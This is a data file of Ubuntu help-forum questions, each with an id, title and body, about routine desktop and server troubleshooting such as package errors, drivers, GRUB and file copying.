195846	prevent nautilus from generating thumbnails for video files larger than 5 mb ?	if i set in nautilus preferences that it should generate thumbnail previews only for files larger than 10 mb , then this only works for pictures . nautilus still keeps generating thumbnails for videos and pdf files . even if a video file is 500 mb . it should only generate thumbnails for video files less than 10 mb as set in the preferences . same goes for pdf . i have many pdf files that are larger than 50 mb . i do n't want nautilus to generate thumbnails for these , only for small sized pdf . how can i make nautilus to obey the previews preferences ? nautilus 3.4.2 ubuntu 12.04.1 , 64bit
195847	how to convert /tmp partition in to other format ? also give some details about /tmp partition ?	i 'm new to ubuntu so do n't know much about partitions . i have a 320gb hard-drive on a hp dv6 i3 2150us . when i was installing ubuntu i gave 100 gb to /tmp mount point thinking that it would be a place other than home to save data . however i ca n't save data in /tmp . i do n't know about /tmp or what it is used for and would be grateful if someone could provide a link . also if anyone could tell me how to convert it into some other format that i would be able to save data on i would be very grateful .
195851	reboot ubuntu without going through the bios post	sometimes i am required to restart my ubuntu machine and do n't want to go through the bios then grub . i remember that in windows we just need to hold down the shift key while clicking restart and trying the same procedure in ubuntu without any success .
195857	i want to get one wallpaper on two monitors streched , i have both of the monitors working fine . ubuntu 12.04	im using ubuntu 12.04 and i havent found any information on my subject for 12.04 ubuntu please help thanks . charles jacobs
195861	about the installation of moses tool on ubuntu 11.04	we are working on project related to language translation with the help of moses tool ... but we are not able to install moses ... we face some installation problems . we make a directory on desktop named workingdir sir we install the initial packages : - $ sudo apt-get install build-essential $ sudo apt-get install subversion $ sudo apt-get install tcl-dev $ sudo apt-get install tclx8.4-dev $ sudo apt-get install g++-multilib $ sudo apt-get install libboost1.40-dev $ sudo apt-get install csh $ sudo apt-get install tcsh then we have some steps to install moses , we use these steps to install moses , we attach the file with this mail ... then we download srilm.tgz from internet and extract that file ... in desktop/workingdir/srilm ... then we go to the path -- -- desktop/workingdir/srilm ... $ cd srilm $ tsch here we type the command : - $ make no_tcl = x machine_type = i686 world we type the command like given below : - secg-thinkcentre-edge-71z : ~/desktop/workingdir/srilm > sudo make no_tcl = x machine_type = i686 world [ sudo ] password for secg : make : * empty variable name . stop . it shows the following error
195865	libreoffice footnote font color	i want to copy/paste into a footnote and adjust the formatting to fit the default footnote formatting . it 's a grey-ish colour not the black color used for text . ca n't find it in the available text colors . how do i get it ?
195876	how to apply mono effect in my icon ?	so my icon is the lizard ( the first one in the tray ) if i open the dash there is an automatic mono effect to all the icons in the tray so i am wondering how can i edit my icon ( with an image editing software ) , to make it mono , so it is more ubuntu-native..
195878	chrome shutting down immediately on opening	while opening google chrome it immediately shutdown . it just started happening . how can i fix this . maybe i need to reset all settings ?
195882	the package system is broken	every time when i 'm trying to remove \ install a program or when i 'm trying to update the ubuntu , suddenly an error window opens and it says : the package system is broken . when i 'm try to update ubuntu , it says the same problem , so i pressed `` details '' and that 's what it says : the following packages have unmet dependencies libdbusmenu-qt2 : i386 : depends : libc6 ( > = 2.1.3 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.6.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtgui4 ( > = 4:4.7.0~beta2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed libqt4-dbus : i386 : depends : libqt4-xml ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-declarative : i386 : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-network : i386 : depends : libqt4-dbus ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-script : i386 : depends : libqt4-dbus ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-sql-mysql : i386 : depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-sql : i386 : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-xml : i386 : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-xmlpatterns : i386 : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed libqtgui4 : i386 : depends : libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.2 is installed skype-bin : i386 : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-network ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtgui4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libstdc++6 ( > = 4.4.0 ) but 4.6.3-1ubuntu5 is installed sni-qt : i386 : depends : libc6 ( > = 2.2 ) but 2.15-0ubuntu10 is installed depends : libdbusmenu-qt2 ( > = 0.3.5 ) but 0.9.2-0ubuntu1 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libqt4-dbus ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtcore4 ( > = 4:4.7.3-1ubuntu3~ ) but 4:4.8.1-0ubuntu4.2 is installed depends : libqtgui4 ( > = 4:4.7.3 ) but 4:4.8.1-0ubuntu4.2 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed please help me fix this , i ca n't install \ remove any program and i also ca n't install updates ...
195885	not working dual monitor on radeon hd 5450	i use radeon hd 5450 . i need work with dual monitor . one try ( not working ) : the first monitor is in vga onboard input . the second monitor on vga radeon 5450 . second try ( not working ) : the first monitor on vga radeon 5450 . the second monitor on dvi radeon 5450 ( i use this adaptor dvi_vga ) . how i can play two monitor , this not working ? i use ubuntu 12.04 .
195886	chromium web browser segfault hangs ( crashes ) my ubuntu 12.04	i had installed chrome browsers and after 2 days my machine hangs indefinitely , the only way to get access to my machine is restarting the machine ( which i hate , badly need expert help . this is what i see from the logs , thought it might be helpful : chromium-browse [ 2701 ] : segfault at bf44c680 ip bf44c680 sp bf95898c error 15 thanks .
195893	is it possible to get a status report from cp ?	is it possible to get a status report from the command line tool cp ? the statusreport should be similar to the one that nautilus ( or any other file manager ) gives when copying files . it should either show the remaining files that should get copied or the remaining mb that should get copied .
195894	the following packages were automatically installed and are no longer required	after a fresh install of ubuntu 12.04.1 ( 64bit ) , i get the following message when i want to install software via terminal : the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic is this normal ? as it 's related to the linux core itself , i am confused that it might break my system .
195895	wake up from screen off ( like windows and mac )	is there a way to configure ubuntu such that it does n't require 2 keystrokes to wake it up from the state where the screen is disabled after being absent , but a simple touch on the touchpad suffices ( akin to the behavior of windows and macos ) ?
195897	how can i install themes on ubuntu 12.04lts ? i know where to get but i do n't know how to install them after i downloaded	i am new to ubuntu . i do n't know how to install softwares other than through ubuntu software center .
195899	how to reduce power consumption in ubuntu ?	why does ubuntu use more power than windows ? which is the best energy manager ?
195901	juju services are not deploying correctly	deploying a charm to your maas now you 're ready for the most exciting part : deploying a charm to your maas ! juju deploy mysql maas will now allocate a node to juju and juju will deploy the mysql charm to that node . again , it 'll take a few minutes to complete while ubuntu installed and then the charm deploys . let 's have a quick status-check : juju status once the charm is deployed , you 'll see it reflected in the environment 's status . if you have another node free you can deploy wordpress and hook it up to the mysql service we just deployed : juju deploy wordpress juju add-relation wordpress mysql juju expose wordpress juju status from : https : //wiki.ubuntu.com/serverteam/maas/juju and i get this : hsf @ ubuntuserwer : ~ $ juju status 2012-10-03 12:47:16,340 info connecting to environment ... enter passphrase for key '/home/hsf/.ssh/id_rsa ' : 2012-10-03 12:47:19,446 info connected to environment . machines : 0 : agent-state : running dns-name : ubuntuone instance-id : /maas/api/1.0/nodes/node-5ac593cc-0c76-11e2-a143-001185e67955/ instance-state : unknown 1 : agent-state : not-started dns-name : node-001185e677fe.local instance-id : /maas/api/1.0/nodes/node-f108eb80-0d3a-11e2-ad9f-001185e67955/ instance-state : unknown 2 : agent-state : not-started dns-name : node-001185e6772b.local instance-id : /maas/api/1.0/nodes/node-cc14c3c8-0d42-11e2-864b-001185e67955/ instance-state : unknown services : mysql : charm : cs : precise/mysql-8 relations : db : - wordpress units : mysql/1 : agent-state : pending machine : 1 public-address : null wordpress : charm : cs : precise/wordpress-9 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/1 : agent-state : pending machine : 2 open-ports : [ ] public-address : null 2012-10-03 12:47:20,404 info 'status ' command finished successfully i tried several times and still is the same problem . aget-state is saying that machines are n't started but they are . what i am doing wrong ? also when i run juju debug-log i get : hsf @ ubuntuserwer : ~ $ juju debug-log 2012-10-03 14:04:16,661 info connecting to environment ... enter passphrase for key '/home/hsf/.ssh/id_rsa ' : 2012-10-03 14:04:19,264 info connected to environment . 2012-10-03 14:04:19,265 info enabling distributed debug log . 2012-10-03 14:04:19,269 info tailing logs - ctrl-c to stop . 2012-10-03 13:56:03,513 machine:0 : juju.agents.machine info : machine agent start ed id:0 2012-10-03 14:03:21,113 machine:0 : twisted error : unhandled error in deferred : 2012-10-03 14:03:21,145 machine:0 : twisted error : unhandled error traceback ( most recent call last ) : failure : zookeeper.nodeexistsexception : node exists
195912	problem with gmail and unity webapps on 12.10 beta 2	i am now using ubuntu 12.10 and my gmail account does n't integrate into unity webapps . i have checked the configuration in firefox preferences and also in the dconf-editor and i found nothing wrong . i also googled the problem with no result , so i 'm quite lost right now . any news of which i have n't heard ?
195915	directory mirroring over network	i need a software or any other way to backup my home directory instantly so that if my data is lost i have another copy over the network . i have a nas on my local network and i want to have an exact copy of my machine home directory over there i do n't want a sync behavior . what i need is a mirror
195917	/etc/hosts keeps getting reset . how am i supposed to edit it ?	whenever i edit my /etc/hosts file it 's not long before i find it is exactly what it was before i edited it . is there some master file i should be editing , or a gui interface i 'm supposed to be using to edit it ? i 'm still on natty .
195922	nvidia quantal/main/binary-amd64/packages 404 not found	i get an 404 error when i try to download nvidia updates on ubuntu 12.10 beta2 . the reason why i get this error is simply because there is no distribution folder for quantal i tried those repos : http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/ http : //ppa.launchpad.net/upubuntu-com/nvidia/ubuntu/dists/ any suggestions or explanations ? why is there no quantal folder and how can i install the nvida drivers via ppa ( please not manual )
195924	is there a big difference between ubuntu with gnome shell and ubuntu gnome remix ?	i want to try ubuntu ( tried different distro 's many times before ) , but none were really to my liking . i always seem to be drawn to ubuntu , thanks to the ppa 's and software . what i do n't like is unity , particularly the dash . that 's why i want to use gnome shell , i like it . i know you can install gnome shell in software center , and uninstall unity , but wo n't there be tons of unity 's configuration files left ? and would upgrading from 12.10 to 13.04 still work ? i know there 's gnome remix available , but is there any advantage over the standard ubuntu with the shell installed ?
195929	problem loading windows	my ubuntu shows the startup screen where i 've to select the os option , in it shows windows 7 option too , but when i choose windows 7 , it does n't load and shows back the same os selection screen . both os are installed on the same drive too . maybe during installation , i changed the address where the windows 7 bootloader is located please help .
195930	software center crashes , synaptic and update manager do n't work	i really need help , i ca n't update or install anything . i 've been searching for answers for my problem for a lot of hours and see that many have had the same problem , or at least a part of it . i 've tried all the answers that the other posts got and nothing worked so i see no other option than posting a question myself . if someone feel like this question should be closed , can you please tell me where to post it instead in order to get help . ( i have ubuntu 12.04 ) problem : when i try to open the ubuntu software center it crashes after 3 seconds , and it has been doing so for a long time . when i open update manager i get this : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_sergio91pt_synaptics+clickpads_ubuntu_dists_precise_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . ' when i open the synaptic package manager i get this : an error occurred ! the following details are provided : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_sergio91pt_synaptics+clickpads_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . when i run : sudo apt-get update in the terminal , i get this : ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //ppa.launchpad.net precise inrelease get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //archive.canonical.com precise release.gpg ign http : //ppa.launchpad.net precise release.gpg get:2 http : //archive.ubuntu.com precise release.gpg [ 198 b ] get:3 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:4 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] ign http : //ppa.launchpad.net precise release hit http : //archive.canonical.com precise release hit http : //archive.ubuntu.com precise release ign http : //ppa.launchpad.net precise/main sources/diffindex ign http : //archive.ubuntu.com precise release hit http : //archive.canonical.com precise/partner sources get:5 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //ppa.launchpad.net precise/main amd64 packages/diffindex ign http : //ppa.launchpad.net precise/main i386 packages/diffindex ign http : //ppa.launchpad.net precise/main translationindex hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex get:6 http : //security.ubuntu.com precise-security/main amd64 packages [ 172 kb ] ign http : //archive.ubuntu.com precise/main amd64 packages/diffindex ign http : //archive.ubuntu.com precise/restricted amd64 packages/diffindex ign http : //archive.ubuntu.com precise/universe amd64 packages/diffindex ign http : //archive.ubuntu.com precise/multiverse amd64 packages/diffindex ign http : //archive.ubuntu.com precise/main i386 packages/diffindex ign http : //archive.ubuntu.com precise/restricted i386 packages/diffindex ign http : //archive.ubuntu.com precise/universe i386 packages/diffindex ign http : //archive.ubuntu.com precise/multiverse i386 packages/diffindex hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:7 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 397 kb ] get:8 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 3,969 b ] get:9 http : //security.ubuntu.com precise-security/universe amd64 packages [ 48.4 kb ] err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found ign http : //archive.canonical.com precise/partner translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en get:10 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2,180 b ] get:11 http : //security.ubuntu.com precise-security/main i386 packages [ 178 kb ] ign http : //ppa.launchpad.net precise/main translation-en get:12 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 6,755 b ] get:13 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 143 kb ] get:14 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 8,681 b ] get:15 http : //archive.ubuntu.com precise-updates/main i386 packages [ 402 kb ] get:16 http : //security.ubuntu.com precise-security/restricted i386 packages [ 3,968 b ] get:17 http : //security.ubuntu.com precise-security/universe i386 packages [ 48.6 kb ] get:18 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,369 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex get:19 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 6,732 b ] get:20 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 143 kb ] hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en get:21 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 9,673 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en fetched 1,676 kb in 2s ( 635 kb/s ) w : gpg error : http : //archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //ppa.launchpad.net/sergio91pt/synaptics+clickpads/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/sergio91pt/synaptics+clickpads/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/sergio91pt/synaptics+clickpads/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and when i run sudo apt-get upgrade i get : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_sergio91pt_synaptics+clickpads_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i 've tried to uninstall skype , which many people suggested , without succeeding to do so . any ideas of what i can do ? i do n't know much about computers or ubuntu ( even though i 've always used it ) so explain as you would to a 10-yearold if you know how i can fix this .
195934	alt+tab does n't work when citrix is in full screen	i am using 12.04 and in my work we connect to a citrix xendesktop . i 've installed citrix receiver , using this link and it all works perfectly . but , i have a problem . alt+tab does n't work in full screen mode . there are several adjustments you can choose when login in , with the settings `` button '' up in the right corner . ( sorry , i could n't post an image because i 'm new . ) i like to work with 95 % full screen , with the windows key combination in `` full screen mode only '' . this allows me to use the windows combinations when a work in full screen , inside the remote computer ( inside citrix ) . i can alt+tab past the `` citrix computer '' when i put it down to 95 % . it also allows me to use the `` ubuntu menu '' on the left side . but i really ca n't make this work in ubuntu . i 've tried to put the windows key combination to `` remote server only '' and yes , it works inside the server , but also only there and the ubuntu menu stops working . ( in example print screen . i am using this for documentation . ) when i try to tab from one place to another , even when citrix is n't in full mode , if i stop there and the continue `` tabbing '' it continues inside citrix . i want to use windows key combination , but only in full screen mode . does anyone have a solution to fix in another way ?
195938	how to create a pygtk status bar icon using quickly python	how can i add an icon to the status bar using python ? like the skype icon ? and is it possible to use the default notifications like those that appear when connecting or disconnecting to a wifi ? thank you
195939	use u1sdtool to show published files	can i somehow use u1sdtool to find out which files have i published on ubuntu one ( and possibly with their public url ) ? now , i have to use the web interface for that .
195947	shutdown functions	on windows was a function to not shut down completely , but save the session in ram to start directly form where you end it . i used the `` turn on '' - button of my laptop to exit the laptop that way . can i program the button on ubuntu if there 's something like that ?
195948	file permissions vulnerability in pure-ftpd using php script	i have created ftp-server using pure-ftpd following this wonderful tutorial . everything works fine , except file access . here is the problem . joe 's home folder is /var/www/joe and steve 's home folder is /var/www/steve . when they log on to the ftp server they enter to their home folders and they can n't access folders of other users . but when joe 's writes a script in php in order to access steve 's file , he can access it . for instance , this script works fine for joe : $ filename = `` /var/www/steve/somefile '' ; $ handle = fopen ( $ filename , `` r '' ) ; $ contents = fread ( $ handle , filesize ( $ filename ) ) ; echo $ contents ; is it the problem of the ftp-server or the problem of apache 's virtual-host file ? how can i solve this problem please ? it is very urgent because it touches the security issue of the users . thank you beforehand !
195950	trying to overwrite '/usr/bin/opencv_haartraining ' , which is also in package libopencv2.3-bin 2.3.1+svn6514+branch23-12~oneiric	after installing some packages and libraries i have an error on package manager , i ca n't run any update because it says : the package system is broken if you are using third party repositories then disable them , since they are a common source of problems . now run the following command in a terminal : apt-get install -f i 've tried to do what it says and it returns me : jara @ jara-aspire-5738 : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libcaca-dev libopencv2.3-bin nite-dev python-bluez ps-engine libslang2-dev python-sphinx ros-electric-geometry-tutorials ros-electric-geometry-visualization python-matplotlib libzzip-dev ros-electric-orocos-kinematics-dynamics ros-electric-physics-ode libbluetooth-dev libaudiofile-dev libassimp2 libnetpbm10-dev ros-electric-laser-pipeline python-epydoc ros-electric-geometry-experimental libasound2-dev evtest python-matplotlib-data libyaml-dev ros-electric-bullet ros-electric-executive-smach ros-electric-documentation libgl2ps0 libncurses5-dev ros-electric-robot-model texlive-fonts-recommended python-lxml libwxgtk2.8-dev daemontools libxxf86vm-dev libqhull-dev libavahi-client-dev ros-electric-geometry libgl2ps-dev libcurl4-openssl-dev assimp-dev libusb-1.0-0-dev libopencv2.3 ros-electric-diagnostics-monitors libsdl1.2-dev libjs-underscore libsdl-image1.2 tipa libusb-dev libtinfo-dev python-tz python-sip libfltk1.1 libesd0 libfreeimage-dev ros-electric-visualization x11proto-xf86vidmode-dev python-docutils libvtk5.6 ros-electric-assimp x11proto-scrnsaver-dev libnetcdf-dev libidn11-dev libeigen3-dev joystick libhdf5-serial-1.8.4 ros-electric-joystick-drivers texlive-fonts-recommended-doc esound-common libesd0-dev tcl8.5-dev ros-electric-multimaster-experimental ros-electric-rx libaudio-dev ros-electric-ros-tutorials libwxbase2.8-dev ros-electric-visualization-common python-sip-dev ros-electric-visualization-tutorials libfltk1.1-dev libpulse-dev libnetpbm10 python-markupsafe openni-dev tk8.5-dev wx2.8-headers freeglut3-dev libavahi-common-dev python-roman python-jinja2 ros-electric-robot-model-visualization libxss-dev libqhull5 libaa1-dev ros-electric-eigen freeglut3 ros-electric-executive-smach-visualization ros-electric-common-tutorials ros-electric-robot-model-tutorials libnetcdf6 libjs-sphinxdoc python-pyparsing libaudiofile0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libcv-dev the following new packages will be installed libcv-dev 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . 2 not fully installed or removed . need to get 0 b/3,114 kb of archives . after this operation , 11.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 261801 files and directories currently installed . ) unpacking libcv-dev ( from ... /libcv-dev_2.1.0-7build1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libcv-dev_2.1.0-7build1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/opencv_haartraining ' , which is also in package libopencv2.3-bin 2.3.1+svn6514+branch23-12~oneiric dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libcv-dev_2.1.0-7build1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried everything people recommend on internet like : sudo apt-get clean sudo apt-get autoremove sudo apt-get update sudo apt-get upgrade sudo apt-get -f install also i 've tried to install the synaptic manager but it does n't let me install anything.. as you can see nothing works so i 'm desperate ! i 'm using ubuntu 11.10 , 64 bits thanks ! !
195952	how to access blocked sites ?	i am in pakistan and youtube is blocked here . i want to take the lecture videos from youtube . in windows , i was using hotspotshield to bypass the proxy . but now , using ubuntu , i do n't know how to bypass the proxy . i found some where that i can bypass the proxy by using putty software . can you guide me how can i bypass proxy by that ? i tried , but i was not able to do so . kindly tell me some easy method to bypass proxy . i do n't want to used websites like accesstoblockedsites.com .
195953	installing latex on virtualenv	i 'm trying to install latex on virtualenv as a part of my project being uploaded to heroku . i used pip install texlive-latex-extra also easy_install texlive-latex-extra for packages texlive-base , texlive-latex , texlive , texlive-latex-extra as i 've mentioned etc . it 's giving me a message that packages do n't exist although , i have installed them locally ; searching for texlive-latex reading http : //pypi.python.org/simple/texlive-latex/ could n't find index page for 'texlive-latex ' ( maybe misspelled ? ) scanning index of all packages ( this may take a while ) reading http : //pypi.python.org/simple/ no local packages or download links found for texlive-latex what point am i missing here ?
195958	umount : it seems [ device ] is mounted multiple times	i was finishing up a job with a compact flash when , trying to unmount it : # > umount /dev/sda2 umount : it seems /dev/sda2 is mounted multiple times looking at what mount says : # > mount | column -t | grep sda2 /dev/sda2 on /mnt/flashrw type ext3 ( rw , nosuid , nodev ) /dev/sda2 on /mnt/flashrw type ext3 ( rw , nosuid , nodev , user=myuser ) it seems that i accidentally mounted the same device on the same location ( though in two different ways ) . i tried to unmount it many times also with : # > umount /mnt/flashrw umount : it seems /mnt/flashrw is mounted multiple times with no luck . finally , i tried : # > sudo umount -f /dev/sda2 but umount locked completely . so the question is : and now ?
195959	is it possible to move font blocks in opentype fonts ?	i 've received a font and it has all the cyrillic letters in latin-1 block , thus replacing phonetic characters . so i have to type `` òåñò '' to get `` тест '' . can it be fixed ?
195961	terminal broken	i 've been using ubuntu for about a week now . i logged in today and launched the terminal i got presented a whole list of errors . i 've tried to chsh but it wo n't recognise the command . nor all other common ones . any ideas ? extra info : $ path : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/jorden/android-sdk-linux/tools : /home/jorden/android-sdk-l
195964	ubuntu 12.04 running on vmware player does not see windows drives	i installed vmware player 5.0.0 today and ubuntu 12.04.1 ubuntu can not see the windows drives or external drive . i am using windows 7 64 bit - do i need to use ubuntu 64 bit also ?
195972	switching between intel and nvidia gpu	my laptop has 2 gpus , the intel hd graphics 4000 , and nvidia geforce ft 650m . how do i switch between gpus ? i tried installing drivers from nvidia , but that ruined my ubuntu installation , and i had to reinstall . the additional drivers in settings do n't list any nvidia drivers either .
195975	how to reset/recover keyrings password on 12.04 ?	recently , i have been refused to sign on to ubuntu one . i have been blocked with the message : enter password to unlock your login keyring . but i have already changed password several times and still getting the same message . i have seen a thread referring to 11.04 . anyone knows how to solve this problem on 12.04 ?
195983	how to copy files via terminal ?	i have read about copying files with terminal but these examples will help me a lot . so here is what i want to do : examples : i have a file in /home/levan/kdenlive untitelds.mpg and i want to copy this file to /media/sda3/skydrive and do not want to delete any thing in skydrive directory . i have a file in /media/sda3/skydrive untitelds.mpg and i want to copy this file to /home/levan/kdenlive and do not want to delete any thing in kdenlive directory i want to copy a folder from home directory to sda3 and do not want to delete any thing on sda3 directory and opposite i want to cut a folder/file and copy to other place without deleting files in that directory i cut it into .
195984	how to install ubuntu on hp pavilion g6	the title says all . i want to install ubuntu on my hp pavilion g6
195986	full copy of ubuntu with installed programs and user files	how to make full copy of ubuntu ( 12.04.1 ) , with ability to `` unpack '' it from windows , to my another flash card ( to have two copy of my ubuntu os ) .
195987	grub ca n't find device on boot resulting in grub rescue	so i have 2 hard drives a hdd 320gb and a ssd 20gb . before i had windows 7 on the hdd and ubuntu on the ssd but wanted to get rid of windows and reinstall a clean ubuntu on the ssd then use the hdd for storage . so i deleted everything from the hdd and set up the ssd with 18gb ext4 and 2gb swap and installed ubuntu on the 18gb ext4 . though now when i boot up i get `` error : no such device grub rescue '' i have a live usb and i ran the boot repair following these instructions - grub rescue after install of ubuntu 12.04 ( dual boot ) - it says successful though still have the same problem . this is the given url from boot repair - http : //paste.ubuntu.com/1257988/ thanks for any help given .
195988	how can i remove launcher drive icons ?	i ca n't disable showing drive 's icons in launcher bar . i have looked for that option both in ccsm ( it used to be in experimental tab ) and in dconf-editor ( desktop- > unity ) and it is missing . how can i remove launcher drive icons ?
